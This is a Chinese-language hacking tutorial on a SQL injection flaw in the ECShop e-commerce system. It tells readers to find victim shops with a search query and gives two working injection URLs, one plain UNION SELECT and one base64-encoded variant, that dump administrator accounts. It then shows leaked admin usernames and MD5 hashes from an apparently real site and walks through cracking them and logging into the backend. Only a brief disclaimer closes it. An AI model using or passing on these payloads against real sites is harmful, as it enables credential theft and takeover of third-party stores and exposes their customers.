ECShop是Comsenz公司推出的一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。目前最新版本为2.6.0。

而这个漏洞呢，暂时是可以说是通杀ecshop的。
如果你没有目标网站，可以google上搜索:powered by ecshop
就可以找到一大堆ecshop的网站


这个时候在其网址后输入病毒代码即可以爆出该站的管理员账户密码

普通代码:"user.php?act=order_query&order_sn=' union   select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*"

而有些网站会针对这个问题作出些修复等等,所以这个普通代码的成功率现在已经不是那么高了.如果普通代码不行,不着急,还有个变种代码

变种代码:"search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319"

之后就可以爆出该网的账户密码

为了大家的方便,就做了辅助工具.


  

直接打开ecshop入侵工具

如果有目标网站就在地址栏上输入目标网站。
如果无目标，就直接点击最上面的搜索ecshop目标站点

随便拿一个网站来试下 [url=javascript:extendurl(]http://shop.magickey0711.com/[/url]

在地址栏中输入该网址，点击普通代码，发现无效。很正常，我上面已经说过了
没关系，还有变种代码
 


到这里别看虽然是一堆英文，但是最重要的管理员密码账户已经被爆了出来了。
我把爆破后出现的那堆英文复制来这里：

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT g.goods_id, g.goods_name, g.market_price, g.is_new, g.is_best, g.is_hot, g.shop_price AS org_price, IFNULL(mp.user_price, g.shop_price * "1') AS shop_price, g.promote_price, g.promote_start_date, g.promote_end_date, g.goods_thumb, g.goods_img, g.goods_brief, g.goods_type FROM `wilson0711_shop`.`ecs_goods` AS g LEFT JOIN `wilson0711_shop`.`ecs_member_price` AS mp ON mp.goods_id = g.goods_id AND mp.user_rank = '0' WHERE g.is_delete = 0 AND g.is_on_sale = 1 AND g.is_alone_sale = 1 AND g.goods_id IN ('admin:25f9e794323b453885f5181f1b624d0b"') union   select 1#"','magickey:3e5b4f7955b1053cda2907cb495e8bd1"') union   select 1#"','wc123:f918b0fe02e36ec4d8f0a1c03417a62e"') union   select 1#"') AND (( 1 ) ) ORDER BY goods_id DESC LIMIT 20 ) [2] => Array ( [error] => The used SELECT statements have a different number of columns ) [3] => Array ( [errno] => 1222 ) )


红色的就是管理员密码；蓝色的就是经过加密后的密码。
拿去各种md5破解站基本上就可以破解出来了。
然后可以点击软件下的md5按钮
就会出现16个我个人收集的，比较好用的md5破解站点
拿去破解吧。
这里不作详细说明。

如果16个网站都破不出来建议你使用其他软件破解。

在破解出密码后，在地址栏中输入网站地址，然后点击网站后台按钮
 安全检测
不得用于非法用途。
希望大家记住我们目标与精神.

谢谢感谢大家的观看。